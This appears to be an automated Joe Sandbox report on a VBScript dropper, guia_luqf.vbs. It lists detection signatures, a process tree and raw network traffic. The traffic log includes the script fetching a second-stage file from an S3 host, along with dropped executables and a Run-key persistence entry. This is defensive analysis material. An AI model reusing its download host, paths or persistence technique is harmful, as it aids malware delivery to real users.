Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
guia_luqf.vbs

Overview

General Information

Sample name:guia_luqf.vbs
Analysis ID:1555843
MD5:3163a6526f07d203061a91ff6e7236c7
SHA1:4561ad4c5e704553b187f6e49218f234a50f157d
SHA256:0799f38e9829f8d7c0926dcf77dc1e1ecb959e209edb9a7320e6bfd331d7e0ad
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
Creates multiple autostart registry keys
May use the Tor software to hide its network traffic
Sigma detected: Execution from Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • chrome.exe (PID: 4280 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • artigo.exe (PID: 7892 cmdline: "C:\users\public\Termos\artigo.exe" MD5: 31DF1F6E455D2A740E1A90E413F9DB68)
      • place.exe (PID: 8128 cmdline: c:\Intrumental\place.exe MD5: 971CB0CF2672A22241854896998DDE20)
      • lspcv2.exe (PID: 4020 cmdline: c:\Intrumental\lspcv2.exe MD5: 2047B6AC02B7C454F61D7E90EE1608FE)
  • place.exe (PID: 7544 cmdline: "C:\Intrumental\place.exe" MD5: 971CB0CF2672A22241854896998DDE20)
  • lspcv2.exe (PID: 7912 cmdline: "C:\Intrumental\lspcv2.exe" MD5: 2047B6AC02B7C454F61D7E90EE1608FE)
  • place.exe (PID: 5316 cmdline: "C:\Intrumental\place.exe" MD5: 971CB0CF2672A22241854896998DDE20)
  • lspcv2.exe (PID: 3220 cmdline: "C:\Intrumental\lspcv2.exe" MD5: 2047B6AC02B7C454F61D7E90EE1608FE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\users\public\Termos\artigo.exe" , CommandLine: "C:\users\public\Termos\artigo.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Termos\artigo.exe, NewProcessName: C:\Users\Public\Termos\artigo.exe, OriginalFileName: C:\Users\Public\Termos\artigo.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5332, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\users\public\Termos\artigo.exe" , ProcessId: 7892, ProcessName: artigo.exe
Sigma detected: Script Initiated Connection to Non-Local Network
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 16.12.9.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5332, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 16.12.9.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Termos\artigo.exe, Initiated: true, ProcessId: 7892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49788
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", ProcessId: 5332, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5332, TargetFilename: C:\Users\Public\Termos.zip
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\Intrumental\place.exe, EventID: 13, EventType: SetValue, Image: C:\Intrumental\place.exe, ProcessId: 8128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Iplace
Sigma detected: Script Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 16.12.9.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5332, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", ProcessId: 5332, ProcessName: wscript.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardHTTP Parser: Title: acesso.gov.pt does not match URL
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardHTTP Parser: <input type="password" .../> found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardHTTP Parser: No <meta name="author".. found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 16.12.9.14:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:50244 version: TLS 1.2

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 16.12.9.14 443Jump to behavior
Source: Joe Sandbox ViewIP Address: 92.53.116.138 92.53.116.138
Source: Joe Sandbox ViewIP Address: 94.241.141.101 94.241.141.101
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: unknownTCP traffic detected without corresponding DNS query: 94.241.141.101
Source: global trafficHTTP traffic detected: GET /preferencia.cdr HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: privacidadeepreferenciapt.s3.eu-north-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/css/styles.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/css/sa-custom.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/css/tabs.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/pf/css/pf-main.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/css/bootstrap.min.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/pf/css/footer.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1Host: static.portaldasfinancas.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/img/autenticacaogov.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; 